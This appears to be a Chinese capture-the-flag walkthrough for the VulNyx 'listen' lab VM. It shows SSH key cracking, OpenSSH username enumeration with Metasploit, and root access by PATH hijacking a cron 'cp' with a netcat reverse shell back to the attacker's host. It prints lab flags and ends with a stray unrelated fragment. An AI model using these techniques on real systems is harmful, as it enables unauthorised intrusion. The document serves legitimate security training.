主机发现
┌──(root㉿xhh)-[~/Desktop/xhh/VluNyx/listen]└─# arp-scan -I eth1 -l192.168.56.151 08:00:27:1b:16:5c PCS Systemtechnik GmbH主机地址为``
端口扫描
┌──(root㉿xhh)-[~/Desktop/xhh/VluNyx/listen]└─# nmap -p- 192.168.56.151PORT STATE SERVICE22/tcpopenssh8000/tcpopenhttp-alt┌──(root㉿xhh)-[~/Desktop/xhh/VluNyx/listen]└─# nmap -sT -sC -sV -O -p22,8000 192.168.56.151Starting Nmap7.95(https://nmap.org)at2025-12-1716:35 CST Nmap scan reportfor192.168.56.151 Host is up(0.00081s latency). PORT STATE SERVICE VERSION22/tcpopensshOpenSSH7.7(protocol2.0)|ssh-hostkey:|20480c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d(RSA)|2569b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a(ECDSA)|_25685:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df(ED25519)8000/tcpopenhttp SimpleHTTPServer0.6(Python3.7.3)|_http-title: Site doesn't have a title(text/html).|_http-server-header: SimpleHTTP/0.6 Python/3.7.3 MAC Address: 08:00:27:1B:16:5C(PCS Systemtechnik/Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could notfindat least1openand1closed port Device type: general purpose|router Running: Linux4.X|5.X, MikroTik RouterOS7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux4.15-5.19, OpenWrt21.02(Linux5.4), MikroTik RouterOS7.2-7.5(Linux5.6.3)Network Distance:1hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.Nmap done:1IP address(1hostup)scannedin22.00seconds8000端口
┌──(root㉿xhh)-[~/Desktop/xhh/VluNyx/listen]└─# curl 192.168.56.151:8000You just have to listen toopenthe door...To abel
抓包
攻击环境抓不到包,把靶机换了个地方抓包
抓到一个私钥
爆破私钥密码
┌──(root㉿xhh)-[~/Desktop/xhh/VluNyx/listen]└─# ssh2john id > tmp┌──(root㉿xhh)-[~/Desktop/xhh/VluNyx/listen]└─# john tmp --wordlist=/rockyou.txtUsing default input encoding: UTF-8 Loaded1passwordhash(SSH, SSH private key[RSA/DSA/EC/OPENSSH32/64])Cost1(KDF/cipher[0=MD5/AES1=MD5/3DES2=Bcrypt/AES])is1forall loaded hashes Cost2(iteration count)is2forall loaded hashes Will run2OpenMP threads Press'q'or Ctrl-C to abort, almost any other keyforstatus idontknow(id)1g0:00:00:00 DONE(2025-12-1716:31)100.0g/s 129600p/s 129600c/s 129600C/s cuties..rangers1 Use the"--show"option to display all of the cracked passwords reliably Session completed.得到密码**/idontknow/**
获取用户名
"22/tcp open ssh OpenSSH 7.7 (protocol 2.0)"ssh版本有点过低
┌──(root㉿xhh)-[~/Desktop/xhh/VluNyx/listen]└─# searchsploit OpenSSH 7.7----------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title|Path ----------------------------------------------------------------------------------------------------------------------------------- --------------------------------- OpenSSH2.3<7.7- Username Enumeration|linux/remote/45233.py OpenSSH2.3<7.7- Username Enumeration(PoC)|linux/remote/45210.py OpenSSH<7.7- User Enumeration(2)|linux/remote/45939.py ----------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results发现存在用户名枚举漏洞
使用msf
msf>search openssh Matching Modules================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0post/windows/manage/forward_pageant.normal No Forward SSH Agent Requests To Remote Pageant1post/windows/manage/install_ssh.normal No Install OpenSSHforWindows2post/multi/gather/ssh_creds.normal No Multi Gather OpenSSH PKI Credentials Collection3auxiliary/scanner/ssh/ssh_enumusers.normal No SSH Username Enumeration4\_ action: Malformed Packet...Use a malformed packet5\_ action: Timing Attack...Use a timing attack6exploit/windows/local/unquoted_service_path2001-10-25 great Yes Windows Unquoted Service Path Privilege Escalation Interact with a module by name or index. For example info6, use6or use exploit/windows/local/unquoted_service_path配置目标主机与字典
msf auxiliary(scanner/ssh/ssh_enumusers)>setRHOSTS192.168.56.151 RHOSTS=>192.168.56.151 msf auxiliary(scanner/ssh/ssh_enumusers)>setUSER_FILE /usr/share/seclists/Usernames/Names/names.txt USER_FILE=>/usr/share/seclists/Usernames/Names/names.txtmsf auxiliary(scanner/ssh/ssh_enumusers)>run[*]192.168.56.151:22 - SSH - Using malformed packet technique[*]192.168.56.151:22 - SSH - Checkingforfalsepositives[*]192.168.56.151:22 - SSH - Starting scan[+]192.168.56.151:22 - SSH - User'abel'found ^C[*]Caught interrupt from the console...[*]Auxiliary module execution completed msf auxiliary(scanner/ssh/ssh_enumusers)>找到用户abel
┌──(root㉿xhh)-[~/Desktop/xhh/VluNyx/listen]└─# ssh abel@192.168.56.151 -i idThe authenticity ofhost'192.168.56.151 (192.168.56.151)'can't be established. ED25519 key fingerprint is SHA256:2b+kTRKlx4qeMsfce+AHPgi/ReUzFfLnFbNEPBAg4uk. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.151' (ED25519) to the list of known hosts. Enter passphrase for key 'id': Last login: Sat Jun323:19:252023from192.168.1.10 abel@listen:~$iduid=1000(abel)gid=1000(abel)groups=1000(abel)成功获得abel用户权限
To root
查看定时任务
abel@listen:~$cat/etc/crontab# /etc/crontab: system-wide crontab# Unlike any other crontab you don't have to run the `crontab'# command to install the new version when you edit this file# and files in /etc/cron.d. These files also have username fields,# that none of the other crontabs do.SHELL=/bin/shPATH=/usr/local/sbin:/dev/shm:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# Example of job definition:# .---------------- minute (0 - 59)# | .------------- hour (0 - 23)# | | .---------- day of month (1 - 31)# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat# | | | | |# * * * * * user-name command to be executed17* * * * rootcd/&&run-parts --report /etc/cron.hourly256* * * roottest-x /usr/sbin/anacron||(cd/&&run-parts --report /etc/cron.daily)476* *7roottest-x /usr/sbin/anacron||(cd/&&run-parts --report /etc/cron.weekly)5261* * roottest-x /usr/sbin/anacron||(cd/&&run-parts --report /etc/cron.monthly)#* * * * * rootcp/var/www/html/index.html /tmp abel@listen:~$发现会把/var/www/html/index.html 复制到 /tmp 中
其次PATH=/usr/local/sbin:/dev/shm:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/dev/shm的优先级是在/usr/bin前
abel@listen:/dev/shm$chmod+xcpabel@listen:/dev/shm$catcpnc192.168.56.2478888-e /bin/bash┌──(root㉿xhh)-[~]└─# nc -lvnp 8888listening on[any]8888...idconnect to[192.168.56.247]from(UNKNOWN)[192.168.56.151]36646uid=0(root)gid=0(root)groups=0(root)成功获得root权限
user.txt && root.txt
cat/home/abel/user.txt&&cat/root/root.txt 33f3f86a697126c6fe0a39a337ade21a ebe57c4d8c4053199d7f66ec0491da9d
 into type (integer).)
